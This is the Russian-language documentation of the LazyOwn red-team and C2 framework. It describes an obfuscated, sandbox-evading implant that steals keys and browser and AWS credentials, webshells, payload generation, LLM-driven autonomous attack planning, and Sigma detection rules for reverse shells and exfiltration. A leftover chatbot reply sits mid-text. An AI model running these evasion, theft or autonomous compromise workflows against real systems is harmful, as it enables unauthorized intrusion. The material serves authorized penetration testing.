(LazyOwn) > purple_dashboard # Textual TUI
Методы обнаружения:
| Метод | Что проверяет |
|---|---|
ai_test |
Предсказание ML-модели LazyOwnBT |
proc_scan |
Подозрительные имена процессов |
net_scan |
Необычные соединения/порты |
log_analyze |
Аномалии auth/syslog |
fim_scan |
Изменения целостности файлов |
redteam_hunt |
Паттерны охоты за угрозами |
sigma_rules |
10 правил Sigma (mimikatz, reverse shell, privesc, nmap, webshell, /etc/shadow, cron, SMB, exfil, injection) |
Движок обнаружения правил Sigma (LazyOwnBT lazyownbt/detection.py):
| ID | Правило | Уровень |
|---|---|---|
| LAZYOWN-001 | Дамп учетных данных Mimikatz | критический |
| LAZYOWN-002 | Паттерн Reverse Shell | критический |
| LAZYOWN-003 | Повышение привилегий через Sudo | высокий |
| LAZYOWN-004 | Обнаружено сканирование Nmap | средний |
| LAZYOWN-005 | Выполнение Webshell | критический |
| LAZYOWN-006 | Внедрение процесса | высокий |
| LAZYOWN-007 | Доступ к /etc/shadow | критический |
| LAZYOWN-008 | Постоянство через Cron | высокий |
| LAZYOWN-009 | Боковое перемещение SMB | высокий |
| LAZYOWN-010 | Экфилизация данных | высокий |
Выходные файлы:
- sessions/purple_dataset.csv — обучающий набор для ML
- sessions/purple_audit.jsonl — полный журнал аудита
- sessions/detection_feedback.jsonl — калибровка оракула
Примечание: Для production-использования интегрируйте с реальным SIEM (Wazuh, Elastic SIEM, Splunk) через пересылку журналов auditd. Встроенные правила Sigma предназначены только для офлайн-тестирования.
skills/hive_mind.pyМультиагентная архитектура queen+drone с общей памятью:
- QueenBrain (Claude): высокоуровневая оркестрация + ConsensusProtocol для действий с высоким риском
- DronePool (Groq/Ollama): параллельное выполнение задач recon/exploit/cred/lateral/privesc
- HiveMemory: семантическая ChromaDB + эпизодическая SQLite + долгосрочное хранение Parquet
- EpisodeReflectionEngine: извлечение уроков после кампании, сохранив sessions/campaign_lessons.jsonl
skills/aci_planner.pyПервый C2-фреймворк, который планирует, выполняет и учится автономно.
ACI устраняет разрыв между целью взаимодействия на естественном языке и полностью автономным циклом выполнения. Ни один конкурент (Cobalt Strike, Sliver, Havoc, Metasploit) не делает это от начала до конца:
Operator: "Compromise the domain controller at corp.internal
starting from a phishing foothold on 10.10.11.5"
↓
ACI Planner ──► MITRE ATT&CK decomposition (LLM-backed, static fallback)
recon → exploit → exec → privesc → cred → lateral → report
↓
ObjectiveStore ─► 20+ concrete objectives injected into sessions/objectives.jsonl
↓
auto_loop / autonomous_daemon ─► executes each objective autonomously
↓
ACIEngine monitors ─► detects stalled phases (blocked_count ≥ 3)
↓
ACIReplan ──► LLM generates alternative techniques for blocked phases
↓
ACIReflector ──► appends lessons to sessions/campaign_lessons.jsonl
feeds back into the next engagement
Три MCP-инструмента:
| Инструмент | Что делает |
|---|---|
lazyown_aci_plan |
Разложить цель → план ATT&CK → внедрить задачи |
lazyown_aci_status |
Живая разбивка по фазам, % выполнения, рекомендация по перепланированию |
lazyown_aci_replan |
Принудительное адаптивное перепланирование при застое; автоматическая генерация уроков |
Быстрый старт:
# 1. Submit the engagement goal
lazyown_aci_plan(
goal="Compromise the DC at corp.internal",
target="10.10.11.5",
scope=["10.10.11.0/24"],
domain="corp.internal",
os_hint="windows",
)
# 2. Start autonomous execution
lazyown_auto_loop(target="10.10.11.5", max_steps=20)
# 3. Monitor progress
lazyown_aci_status()
# 4. When blocked (blocked_count >= 3)
lazyown_aci_replan(reason="Kerberoasting blocked by AV, try AS-REP roasting")
Что делает ACI уникальным по сравнению с другими инструментами:
Постоянство:
| Файл | Содержимое |
|---|---|
sessions/aci_plan.json |
Активный план: фазы, задачи, состояние завершения |
sessions/aci_history.jsonl |
Архив завершенных/заброшенных планов |
sessions/campaign_lessons.jsonl |
Уроки, извлеченные ACIReflector |
Использование CLI (автономно):
python3 skills/aci_planner.py plan "Compromise DC" --target 10.10.11.5 --os windows
python3 skills/aci_planner.py status
python3 skills/aci_planner.py replan "technique blocked"
python3 skills/aci_planner.py reflect
skills/autonomous_daemon.pyЧетыре роли asyncio в одном процессе — Claude не требуется между шагами:
Role 1 — ObjectiveLoop : watches objectives.jsonl, takes + executes
Role 2 — ExecutionEngine : 6-layer cascade per step, RL Q-table feedback
Reactive → Parquet → Bridge → SWAN(MoE+RL) → LLM → Fallback
Role 3 — WorldModelWatcher : graph centrality + pivot candidate tracking
Role 4 — DroneCoordinator : hive drone spawning on recon/cred/service findings
Включите SWAN в демоне: export AUTO_USE_SWAN=1 перед запуском.
ACI передает данные в демон: задачи, внедренные lazyown_aci_plan, автоматически
подхватываются Ролью 1 (ObjectiveLoop) — дополнительная настройка не требуется.
modules/world_model.pyNetworkGraph отслеживает все обнаруженные связи (хосты, службы, учетные данные, пути доверия) и вычисляет нормализованную центральность по степени для выявления кандидатов на пивотинг. Топ-3 кандидатов внедряются в каждый вызов to_context_string(), гарантируя, что автономный цикл всегда знает цели бокового перемещения с наибольшей ценностью.
Red-team фреймворк, который читает свою цель из payload.json, имеет острый край:
Случайный rhost запускает атакующие команды против неавторизованного хоста. Защитный ограничитель — это страховочная сетка. Каждая интерактивная команда проходит через единую точку контроля, которая проверяет активную цель на соответствие вашему авторизованному объему работ до выполнения команды.
(LazyOwn) > scope add 10.10.11.0/24 # CIDR, bare IP, hostname, or *.corp.local wildcard
(LazyOwn) > scope add dc.corp.local
(LazyOwn) > scope mode enforce # off | warn (default) | enforce
(LazyOwn) > scope # show current scope and posture
off, поэтому существующие кампании не затрагиваются, пока вы не включите его. Любая внутренняя ошибка разрешает команду, а не блокирует оператора.warn помечает атакующие команды вне области; enforce блокирует их до явного подтверждения (и отказывает в неинтерактивных сессиях).do_* автоматически классифицируются.payload.json (scope, scope_enforcement); чистая логика находится в cli/scope_guard.py без какой-либо связи с оболочкой.Зависимости объявлены один раз в pyproject.toml (единый источник истины) и зафиксированы для воспроизводимой установки:
requirements.txt — кросс-платформенный основной замок (без CUDA-колес).requirements-ml.txt — опциональный, тяжелый ML-стек (torch/CUDA, scikit-learn).install.sh работает в строгом режиме и идемпотентен. Установка по умолчанию легкая; дополнительные опции включаются с помощью --with-ml (ML-стек 2 ГБ), --with-ollama (локальная среда LLM) и --with-tools (распространенные внешние бинарники).pip install -e .[ml,dev].Ctrl+K), встроенные реактивные подсказки после каждой команды и панель управления Textual TUI.yara_marketplace (10 встроенных правил: программы-вымогатели, C2, веб-шеллы, обфускация, повышение привилегий), nuclei_marketplace (500+ шаблонов), marketplace для плагинов и дополнений сообщества — все доступно через curses TUI.auto_pwn автоматически проходит фазы kill-chain, hunt выполняет целевое обнаружение на основе известных TTP.auto_crypto шифрует чувствительные файлы сессий при выходе и расшифровывает при запуске (PBKDF2HMAC + Fernet), прозрачно для оператора.dlopen во время выполнения. API datap совместим с исходным кодом Windows BOF. Поддержка прямых системных вызовов и io_uring.sessions/captured_images.lazynmap.Симуляция противника: расширенные возможности для генерации сессий операций красной команды, обеспечивающие тщательные и эффективные симуляции.
Планирование задач: Используйте команду cron для планирования и автоматизации задач, обеспечивая постоянные симуляции угроз.
/addons в панели C2 для создания интеграций lazyaddons/*.yaml без ручного редактирования YAML. Одна форма предоставляет все параметры аддона (имя, описание, автор, версия, включен, целевая ОС, триггерные службы, категория, тип модуля, тип установки, параметры, блок инструментов, дополнительные C2, переменные окружения) с подсказками, заполнителями и справкой по каждому полю. Чипы-заполнители ({rhost}, {url}, объявленные параметры и каждый ключ payload.json) можно перетаскивать в командные поля. Серверная валидация отклоняет небезопасные имена, обход пути, неизвестные заполнители и некорректные URL до записи файла; запись выполняется атомарно и безопасно (временный файл создается с ограниченными правами через mkstemp + fchmod, сбрасывается и синхронизируется, затем заменяется через os.replace). Страницы списка и предпросмотра YAML завершают жизненный цикл. Каждый изменяющий маршрут защищен CSRF. Контракт: lazyc2/addon_creator.py + lazyc2/blueprints/addons.py, покрыт тестами tests/test_addon_creator.py и мутационным шлюзом tests/run_mutation_addon_creator.py.
9. Не обнаруживаемые, обфусцированные и изменяемые GO-импланты: Команда с полезной нагрузкой по умолчанию обфусцирована. Вместо прямой загрузки beacon-модуля загружается заглушка (stub), созданная на C, которая загружает beacon, закодированный с помощью XOR-ключа. Затем он декодируется в памяти и выполняется во временном пути с уникальным именем для обхода обнаружения, используя svchost в Windows и lazyservice в Linux. Это двухэтапный имплант, протестированный на ядре 6.12 и Windows [Version 10.0.20348.3807]. Кроме того, добавлена альтернативная заглушка для Windows с использованием LOLBAS PS1 и Csharp, а также версия ebird3 в LOLBAS, использующая те же технологии. Go-beacon — это мультиплатформенный, необнаруживаемый и сильно обфусцированный имплант, предназначенный для продвинутых операций red teaming. Он обладает полиморфизмом, работает в настраиваемом скрытном режиме и обеспечивает безопасную связь через каналы с шифрованием AES-256. Beacon маскируется в среде, имитируя легитимный сетевой трафик, и обходит обнаружение, выявляя виртуальные машины, песочницы, контейнеры и отладчики, динамически адаптируя свое поведение. При минимальном занимаемом пространстве он поддерживает надежное обнаружение сети через перебор хостов с помощью ping и сканирование портов заданных целей. Имплант отлично справляется с эксфильтрацией конфиденциальных данных, включая приватные ключи, учетные данные AWS, учетные данные браузера и системные журналы. Он предлагает динамическое TCP-проксирование для перенаправления трафика, попытки повышения привилегий и очистку системных журналов. Постоянство достигается на Windows, Linux и macOS через запланированные задачи, systemd, crontab и LaunchAgents. Дополнительные возможности включают эмуляцию противника (MITRE ATT&CK), обфускацию временных меток файлов и сжатие каталогов для эксфильтрации. Созданный с использованием Go vet для проверки здоровья кода, имплант легко интегрируется с Docker-средами и микро-ВМ AWS Firecracker, что делает его краеугольным камнем современной инфраструктуры red team. Используя Cloudflare для обфускации трафика, имплант направляет связь через безопасные высокопроизводительные редиректоры для сокрытия C2-инфраструктуры. Go-бинарник защищен обфускацией Garble, что затрудняет реверс-инжиниринг и обнаружение по сигнатурам. На Windows имплант использует маскировку расширений, чтобы выдавать себя за безобидные файлы (например, .pdfx), и встраивает пользовательские иконки через rsrc для убедительной социальной инженерии.modules/killchain.py вычисляет фазу; каждый интерфейс (CLI /killchain, /api/killchain, C2 /api/data+/api/dashboard, панель GUI2) отображает её snapshot()./api/beacon_results/<client_id>, поддерживается модулем modules/beacon_history.py (JSONL, безопасные пути)./killchain auto on|off|N — живое автообновление; флаги killchain_auto_every / killchain_auto_on_phase_change.Просмотр, поиск и установка из единого TUI-маркетплейса:
- yara_marketplace list|search|install|info — 10 встроенных правил (ransomware, C2, веб-оболочки, обфускация, повышение привилегий)
- nuclei_marketplace list|search|install|info — 500+ шаблонов из ~/nuclei-templates
- marketplace list|search|install|update — 120+ YAML-аддонов, 56 плагинов, 69 инструментов
auto_pwn — автономное прохождение цепочки атак от разведки до эксплуатацииhunt — разведка на основе угроз: сопоставляет известные TTP с обнаруженными сервисамиПрозрачное шифрование сессии при выходе / расшифровка при запуске через PBKDF2HMAC + Fernet.
7 профилей APT: Azure Graph API, CICD Poisoning, Entra Connect, macOS TCC, OAuth Token Theft, SCCM/MECM, VDI Breakout.
chainmode on запускает поток цепочек, управляемый моделью мира: после каждой команды оболочка предлагает ранжированные следующие шаги (Enter = лучший вариант, 1..N = ранжированная альтернатива, любая команда = переопределение, skip = ручной режим, ESC/Ctrl+C/off = выход). Неверные выборы повторно запрашиваются вместо молчаливого пропуска, и поток автоматически приостанавливается после max_steps связанных команд. Состояние сохраняется в sessions/chain_mode.json (атомарные записи). Контракт: cli/chain_mode.py + cli/command_chain.py.
[0, 99], никогда не нечестные 100%), причину и происхождение. Контракт: cli/reactive_hints.py + cli/recommendation_signals.py.cli/tips_engine.py.cli/noise_verbs.py — единый источник истины для списков неинформативных глаголов, используемых подсказками, советами и режимом цепочки.core/api_authz.py теперь реализует документированное окно ротации, копирует разрешения из ротированного ключа (исправлен регресс), возвращает JSON 401/403 (безопасно с TRAP_HTTP_EXCEPTIONS), и конечная точка C2 /api/health/tenant реально применяется. Проверка мутаций: tests/run_mutation_api_authz.py (7/7 убито).core/logging.py install_json_handler сохраняет существующие обработчики и идемпотентен.LazyOwn предоставляет 606+ команд в 13 фазах цепочки атак, доступных как из CLI, так и из веб-панели C2:
| Фаза | Ключевые команды |
|---|---|
| Разведка | lazynmap, ping, whatweb, gobuster, ffuf, dig, dnsenum, finalrecon |
| Перечисление | enum4linux, cme, bloodhound, nuclei, kerbrute, ldapdomaindump |
| Эксплуатация | auto_pwn, hunt, ss (searchsploit), venom, lazymsfvenom, searchhash |
| Пост-эксплуатация | linpeas, winpeas, blacksandbeacon, mimikatzpy, disableav |
| Закрепление | persist, backdoor, cron, schtask, createwebshell |
| Повышение привилегий | getcap, sudo, adcs_check, privesc_predictor |
| Доступ к учётным данным | secretsdump, evil, getnpusers, hashcat, john, spraykatz |
| Горизонтальное перемещение | psexec, wmiexec, ssh_cmd, chisel, ligolo, bloodhound |
| Эксфильтрация | exfil, upload_gofile, encrypt/decrypt, compressdir |
| C2 | lazyc2, blacksandbeacon, createrevshell, listener_go |
| Отчёты | report, lazyreport, campaign_sitrep, timeline, dashboard |
| ИИ/Агенты | auto_loop, recommend_next, playbook_generate, playbook_run, orchestrate |
| Маркетплейс | yara_marketplace, nuclei_marketplace, marketplace, lab |
Основное управление: assign, show, doctor, wizard, scope, collab_join, config_banner, palette, fz. |
Полный справочник по 606 командам см. в COMMANDS.md, а 18 команд, покрывающих 80% задач, — в ESSENTIALS.md.
В этом документе объясняется, как использовать Lua-скрипты для расширения функциональности приложения LazyOwnShell, построенного на основе фреймворка cmd2 на Python. Lua позволяет создавать собственные плагины, которые могут добавлять новые команды, изменять существующее поведение или получать доступ к данным приложения.
Приложение LazyOwnShell поддерживает Lua-скрипты, позволяя пользователям расширять его функциональность без изменения основного кода Python. Lua-скрипты (плагины) хранятся в каталоге plugins/ и автоматически загружаются при запуске приложения.
Lua-плагины могут: - Добавлять новые команды в оболочку. - Изменять существующие команды или поведение. - Получать доступ к данным приложения, предоставляемым Python, и управлять ими.
Чтобы использовать Lua-плагины, убедитесь в следующем:
Установите библиотеку lupa в вашем Python-окружении:
bash
pip install lupa
bash
plugins/
init_plugins.lua
hello.lua
goodbye.lua
При запуске приложения выполняется файл init_plugins.lua, который загружает все остальные .lua-файлы в каталоге plugins/.
Написание Lua-плагинов Lua-плагин — это файл сценария с расширением .lua, размещённый в каталоге plugins/. Каждый плагин может определять функции и регистрировать их как команды в оболочке.
Структура Lua-плагина
```lua -- Определяем функцию для новой команды function my_command(arg) -- Ваша логика здесь print("Это новая команда: " .. (arg or "по умолчанию")) end
-- Регистрируем функцию как команду
register_command("my_command", my_command)
``` Ключевые функции - register_command(command_name, lua_function): - Регистрирует новую команду в оболочке. - command_name: имя команды (например, hello). - lua_function: функция Lua, которая выполняется при вызове команды.
Чтобы добавить новую команду в оболочку, выполните следующие шаги:
Создайте файл plugins/hello.lua со следующим содержимым:
```lua function hello(arg) local name = arg or "мир" print("Привет, " .. name .. "!") end
register_command("hello", hello)
Теперь вы можете выполнить команду hello в оболочке:bash
hello Lua
Привет, Lua!
```
4. Лучшие практики
- Держите плагины модульными : каждый плагин должен быть сосредоточен на одной функции или возможности.
- Документируйте свои плагины : предоставьте четкую документацию для каждого плагина, включая примеры использования.
- Тщательно тестируйте : тестируйте плагины изолированно перед интеграцией в основное приложение.
- Корректно обрабатывайте ошибки : используйте pcall для обработки ошибок в Lua-плагинах и предотвращения сбоев.
Используя Lua-скрипты, вы можете расширить функциональность LazyOwnShell без изменения основного кода Python. Это обеспечивает большую гибкость и настройку, позволяя пользователям писать собственные плагины для удовлетворения конкретных потребностей. Удачного кодинга!
Расширение возможностей LazyOwn RedTeam Framework стало проще, чем когда-либо, даже для не-программистов, благодаря системе LazyAddons, которая позволяет расширять функциональность с помощью YAML-файлов.
Декларативное создание команд через YAML-файлы конфигурации.
lazyaddons/ ├── addon1.yaml ├── addon2.yaml └── example.yaml
name: "shortname" # CLI command (do_shortname)
enabled: true
description: "Tool description for help system"
tool:
name: "Full Tool Name"
repo_url: "https://github.com/user/repo"
install_path: "tools/toolname"
execute_command: "python tool.py -u {url}"
Расширенная конфигурация
params:
- name: "url"
required: true
description: "Target URL"
default: "http://localhost"
- name: "threads"
required: false
default: 4
Возможности Автоустановка Инструменты клонируются из Git, если они отсутствуют:
git clone <repo_url> <install_path>
Подстановка параметров Заменяет {param} в командах значениями из:
help <команда> отображает описание из YAML.
Шаблон
name: ""
enabled: true
description: ""
tool:
name: ""
repo_url: ""
install_path: ""
install_command: "" # Optional
execute_command: ""
params:
- name: ""
required: true/false
default: ""
description: ""
▶️ Использование Поместите YAML-файлы в lazyaddons/
Запустите ваше CLI-приложение
Выполните зарегистрированные команды:
(Cmd) help your_command
(Cmd) your_command -args
🚨 Устранение неполадок Отсутствующие параметры: проверьте обязательные поля в YAML
Ошибки установки: проверьте доступ к сети/git
Ошибки команд: проверьте синтаксис execute_command
Ключевые особенности: - Чистый markdown в стиле GitHub - Ориентация только на YAML-аддоны - Включает готовые шаблоны - Описывает систему подстановки параметров - Содержит советы по устранению неполадок
Хотите, чтобы я добавил конкретные примеры или сценарии использования?
LazyOwn на Reddit
Революционизируйте ваш пентест с LazyOwn: автоматизируйте вторжение на Linux, MAC OSX и Windows ЖЕРТВ
https://www.reddit.com/r/LazyOwn/
https://github.com/grisuno/LazyOwn/assets/1097185/eec9dbcc-88cb-4e47-924d-6dce2d42f79a
Откройте для себя LazyOwn — идеальное решение для автоматизации рабочего процесса пентеста для атак на системы Linux, MacOSX и Windows. Наш мощный инструмент упрощает пентест, делая его более эффективным и действенным. Посмотрите это видео, чтобы узнать, как LazyOwn может оптимизировать ваши оценки безопасности и расширить ваш набор кибербезопасности.
LazyOwn> assign rhost 192.168.1.1
[SET] rhost set to 192.168.1.1
LazyOwn> run lazynmap
[INFO] Running Nmap scan on 192.168.1.1
...
LazyOwn идеально подходит для специалистов по кибербезопасности, которым нужно централизованное и автоматизированное решение для задач пентеста, экономящее время и повышающее эффективность выявления и эксплуатации уязвимостей.
subprocess (входит в стандартную библиотеку Python)platform (входит в стандартную библиотеку Python)tkinter (необязательно для GUI)numpy (необязательно для GUI)git clone https://github.com/grisuno/LazyOwn.git
cd LazyOwn
./install.sh
./run or ./fast_run_as_r00t.sh
./run --help
[;,;] LazyOwn vvvrelease/0.2.8
Usage: ./run [Options]
Options:
--help Show this help panel.
-v Show version.
-p <payloadN.json> Exec with different payload.json example. ./run -p payload1.json, (Special for RedTeams)
-c <command> Exec a command using LazyOwn example: ping
--no-banner No Banner
-s Run as root
--old-banner Show old Banner
./fast_run_as_r00t.sh --vpn 1 (the number id of your file in vpn directory)
Use assign <parameter> <value> to configure parameters.
Use show to display the current parameter values.
Use run <script_name> to execute a script with the set parameters.
Use exit to exit the CLI.
Once the shell is running, you can use the following commands:
list: Lists all LazyOwn Modules.
assign <parameter> <value>: Sets the value of a parameter. For example, assign rhost 192.168.1.1.
show: Displays the current values of all parameters.
run <script>: Executes a specific script available in the framework.
Available Scripts
┌─[👤grisun0 (LazyOwn👽kali) ~/home/grisun0/LazyOwn][127.0.0.1][http://VariaType.htb] 🌐192.168.1.120 ✗ feature/lazyllmchat-assistant (🐍env)
└╼ $ help
01. Reconnaissance
──────────────────
alterx finalrecon ping trace
apache_users getcap ports trufflehog
binarycheck gospider proxy tshark_analyze
cve graudit recon waybackmachine
dig httprobe serveralive2 whatweb
dnschef ipinfo sherlock windapsearchscrapeusers
dnsenum launchpad sslscan
dnsmap metabigor tcpdump_capture
dnstool_py openssl_sclient tcpdump_icmp
02. Scanning & Enumeration
──────────────────────────
ad_ldap_enum enum4linux_ng nbtscan rpcdump wpscan
allin evil_ssdp net_rpc_addmem rpcmap_py
amass feroxbuster netexec samrdump
arjun finger_user_enum netview sawks
arpscan fuzz nikto sessionssh
batchnmap getnpusers nmapscript skipfish
bbot gobuster nuclei smbattack
blazy hound odat smbclient
bloodhound kerbrute openredirex smbclient_impacket
breacher lazynmap osmedeus smbclient_py
certipy ldapdomaindump parsero smbmap
certipy_ad ldapsearch parth smtpuserenum
changeme lookupsid portdiscover snmpcheck
cme lookupsid_py portservicediscover snmpwalk
davtest loxs pre2k swaks
dirsearch lynis pykerbrute vscan
dmitry magicrecon rdp_check_py wfuzz
enum4linux mqtt_check_py rpcclient windapsearch
03. Exploitation
────────────────
aclpwn_py gettgtpkinit_py psexec sqlmap
addspn_py greatSCT psexec_py sqsh
autoblody img2cookie py3ttyup ss
cacti_exploit jwt_tool pyautomate sshexploit
commix krbrelayx_py pyoracle2 template_helper_serializer
cp kusa pywhisker ticketer
createcookie lazypwn rejetto_hfs_exec unicode_WAFbypass
createdll lfi rev upload_bypass
digdug lol seo utf
download_exploit ms08_067_netapi sharpshooter winbase64payload
downloader ntpdate shellfire wrapper
eternal owneredit shellshock www
excelntdonut padbuster sireprat xss
filtering powerserver sqli xsstrike
gets4uticket_py printerbug_py sqli_mssql_test
04. Post-Exploitation
─────────────────────
add2find exe2bin pezorsh
adversary exe2donutbin pip_proxy
adversary_yaml extract_yaml pip_repo
aes_pe find powershell_cmd_stager
ai_playbook follina rmfromfind
apt_proxy hex2shellcode rubeus
apt_repo internet_proxy scavenger
atomic_lazyown issue_command_to_c2 scp
bin2shellcode lazywebshell service_ssh
convert_remcomsvc_from_file mimikatzpy sessionsshstrace
cports msfshellcoder shellcode
create_synthetic ofuscate_string shellcode2elf
createpayload ofuscatesh shellcode2sylk
d3monizedshell ofuscatorps1 shellcode_search
disableav path2hex ssh_cmd
05. Persistence
───────────────
asprevbase64 ftp msfpc setoolKits
backdoor_factory generate_revshell paranoid_meterpreter ssh
conptyshell grisun0 pwncat toctoc
createrevshell grisun0w pwncatcs veil
createwebshell ivy rdp weevely
createwinrevshell knokknok revwin weevelygen
darkarmour listener_go scarecrow
dr0p1t listener_py service
06. Privilege Escalation
────────────────────────
responder smbserver
07. Credential Access
─────────────────────
addusers cred john2hash rocky
adsso_spray creds_py john2keepas searchhash
cewl crunch john2zip smalldic
crack_cisco_7_password cubespraying keepass spraykatz
createcredentials dacledit medusa sshkey
createhash generatedic passtightvnc sudo
createmail hashcat passwordspray transform
createusers_and_hashs hydra refill_password username_anarchy
08. Lateral Movement
────────────────────
addcli id_rsa penelope sshd wifipass
bloodyAD lateral_mov_lin regeorg stormbreaker wmiexec
chisel ligolo rnc targetedKerberoas wmiexecpro
dcomexec mssqlcli set_proxychains tord
getTGT nc shadowsocks upload_c2
gospherus ngrok socat vpn
09. Data Exfiltration
─────────────────────
adgetpass dploot evilwinrm getuserspns reg_py secretsdump
decrypt encrypt getadusers gitdumper rsync unzip
download_c2 evidence getnthash_py gmsadumper samdump2 upload_gofile
10. Command & Control
─────────────────────
atomic_agent automsf emp3r0r mitre_test sliver_server
atomic_gen c2 empire msf
atomic_tests caldera generate_playbook msfrpc
attack_plan duckyspark iis_webdav_upload_asp my_playbook
11. Reporting
─────────────
apropos createtargets gpt process_scans
banners download_malwarebazar groq pth_net
c2asm extract_ports img2vid pup
camphish eyewitness malwarebazar vulns
create_session_json eyewitness_py morse
createjsonmachine get_avaible_actions name_the_hash
createjsonmachine_batch gowitness nmapscripthelp
12. Miscellaneous
─────────────────
acknowledgearp clone_site getseclist links run
acknowledgeicmp cron graph list sh
addhosts decode h load_session show
aliass download_resources hex_to_plaintext nano sys
assign encode ignorearp news tab
banner encoderpayload ignoreicmp payload urldecode
base64decode encodewinbase64 ip pwd urlencode
base64encode exit ip2asn qa v
check_update fixel ip2hex rhost
clean fixperm kick rot
clock gencert lazyscript rotf
13. Lua Plugin
──────────────
generate_c_reverse_shell lolbas_certutil_download_exec
generate_cleanup_commands lolbas_certutil_exe
generate_html_payload lolbas_mshta_js
generate_lateral_command lolbas_mshta_reverse_shell
generate_linux_asm_reverse_shell lolbas_rundll32_dll
generate_linux_raw_shellcode lolbas_wmic_xsl_execution
generate_lolbird parse_nmap_with_xmlstarlet
generate_msfvenom_loader run_nuclei_on_nmap_files
generate_msfvenom_loader_windows run_python_rev_c2
generate_reverse_shell rundll32_sct_from_url
generate_stub validate_shellcode
kerberos_harvest visualize_network
lolbas_bitsadmin_exe
14. Yaml Addon.
───────────────
AdaptixC2 GoPEInjection OverRide
agentzero gosearch peeko
argfuscator gui pretender
ATTPwn gui2 PTMultiTools
AuroraPatch hack_browser_data PTMultiTools_scan
banner_tool hellbird PyinMemoryPE
bbr hive pyrit
beacon hooka_linux_amd64 raven
blacksandbeacon hostdiscover ridenum
blacksandbeacon_bof kivi_revshell setoolkit
cgoblin_windows laps ShadowLink
Clematis lazyaddon_creator shellcode_custom_win_rev_tcp_xored
commix2 lazyagentAi SigPloit
copy-fail-CVE-2026-31431 lazybinenc spoonmap
CVE-2022-22077 lazyftpsniff stratus_detonate
CVE_2025_24071_PoC LazyLoader stratus_list
demiguise lazymapd toposwarm
ebird3 lazyownbt unicorn
evilginx2 LazyOwnExplorer upxdump
gcr llm vulnbot
gemini-cli NullGate vulnbot_groq
gen_dll_rev oniux vulnhuntr
Get_ReverseShell opencode_adapter watchguard
githubot orpheus wspcoerce
gomulti_loader_linux
gomulti_loader_windows
15. Adversary YAML.
───────────────────
amsi_c implant_nim_nim infect_c pid_c
implant_crypt_go implant_rust_rs persist_ps1 shell_c
16. Artificial Intelligence
───────────────────────────
ai_toggle
Uncategorized Commands
──────────────────────
addalias gobuster_dns ipy ollama_enum set
alias gobuster_http listaliases pop shell
edit gobuster_web macro quit shortcuts
EOF help nikto_host rrhost subwfuzz_tool
ffuf_enumeration history notify run_pyscript
ffuf_tool ipp nuclei_ad_http run_script
┌─[👤grisun0 (LazyOwn👽kali) ~/home/grisun0/LazyOwn][127.0.0.1][http://VariaType.htb] 🌐192.168.1.120 ✗ feature/lazyllmchat-assistant (🐍env)
└╼ $
https://www.youtube.com/hashtag/lazyown
https://www.youtube.com/watch?v=m4FtlhownvM&list=PLW9Qe5HJK5CFXyIsF9b0NB6n9EY8Am3YZ
https://deepwiki.com/grisuno/LazyOwn/
LazyOwn> assign binary_name my_binary
LazyOwn> assign rhost 192.168.1.100
LazyOwn> assign api_key my_api_key
LazyOwn> run lazysearch
LazyOwn> run lazynmap
LazyOwn> exit
Для поиска по базе данных, полученной из GTFOBins.
python3 lazysearch.py binario_a_buscar
Дополнительные функции и улучшения: AutocompleteEntry:
Добавлен фильтр для удаления значений None из списка автозаполнения. Новый вектор атаки:
В основной интерфейс добавлена кнопка «Новый вектор атаки». Реализована функциональность для добавления нового вектора атаки и сохранения обновленных данных в файлах Parquet. Экспорт в CSV:
В основной интерфейс добавлена кнопка «Экспорт в CSV». Реализована функциональность экспорта данных DataFrame в выбранный пользователем CSV-файл. Использование:
Добавить новый вектор атаки: нажмите кнопку «Новый вектор атаки», заполните поля и сохраните. Экспорт в CSV: нажмите кнопку «Экспорт в CSV» и выберите место для сохранения CSV-файла. Новая функция scan_system_for_binaries:
Реализует поиск бинарных файлов по всей системе с помощью команды file для определения, является ли файл бинарным. Использует os.walk для обхода файловой системы. Результаты отображаются в новом окне внутри графического интерфейса. Кнопка для поиска бинарных файлов:
В основной интерфейс добавлена кнопка «Поиск бинарных файлов в системе», которая вызывает функцию scan_system_for_binaries. Примечание:
Функция is_binary использует команду file из Unix для определения, является ли файл исполняемым бинарным. Если вы используете другую операционную систему, вам потребуется адаптировать этот метод для совместимости. Эта реализация может быть ресурсоемкой, так как она обходит всю файловую систему. Вы можете рассмотреть возможность добавления дополнительных опций для ограничения поиска определенными каталогами или фильтрации по типам файлов.
python3 LazyOwnExplorer.py
python3 lazyown.py
Если вы хотите обновиться, действуем следующим образом:
cd LazyOwn
rm parquets/*.csv
rm parquets/*.parquet
./update_db.sh
Коллекция LazyOwn Webshell — это набор веб-шеллов для нашего фреймворка, который позволяет нам установить веб-шелл на машине, где мы запускаем LazyOwn, с использованием различных языков программирования. По сути, LazyOwn Webshell поднимает веб-сервер в каталоге модулей, делая его доступным через веб-браузер. Это позволяет нам как предоставлять модули отдельно через веб, так и получать доступ к каталогу cgi-bin, где находятся четыре шелла: один на Bash, другой на Perl, третий на Python и один на ASP, на случай, если целевая машина работает под управлением Windows.
lazywebshell
и всё, теперь мы можем получить доступ к любому из этих URL:
http://localhost:8080/cgi-bin/lazywebshell.sh
http://localhost:8080/cgi-bin/lazywebshell.py
http://localhost:8080/cgi-bin/lazywebshell.asp
http://localhost:8080/cgi-bin/lazywebshell.cgi
Выполняет инструмент `msfvenom` для генерации различных полезных нагрузок на основе пользовательского ввода.
Эта функция запрашивает у пользователя выбор типа полезной нагрузки из предопределенного списка и запускает соответствующую
команду `msfvenom` для создания желаемой полезной нагрузки. Она обрабатывает такие задачи, как генерация различных типов
полезных нагрузок для систем Linux, Windows, macOS и Android, включая необязательное кодирование с помощью Shikata Ga Nai для C-полезных нагрузок.
Сгенерированные полезные нагрузки перемещаются в каталог `sessions`, где устанавливаются соответствующие разрешения. Кроме того,
полезные нагрузки могут быть сжаты с помощью UPX для экономии места. Если выбранная полезная нагрузка является Android APK,
функция также подпишет APK и выполнит необходимые шаги постобработки.
:param line: Аргументы командной строки для скрипта.
:return: None
run lazymsfvenom or venom
Система Command & Control (C2) обеспечивает удаленные операции через архитектуру клиент-сервер с шифрованной связью.
В /tmp будет создан файл с именем binary_name, указанным в полезной нагрузке, инициализированный с помощью gzip в памяти и использующий bash в полезной нагрузке. Чтобы задать полезную нагрузку из JSON, используйте команду payload для выполнения. Используйте:
lazypathhijacking
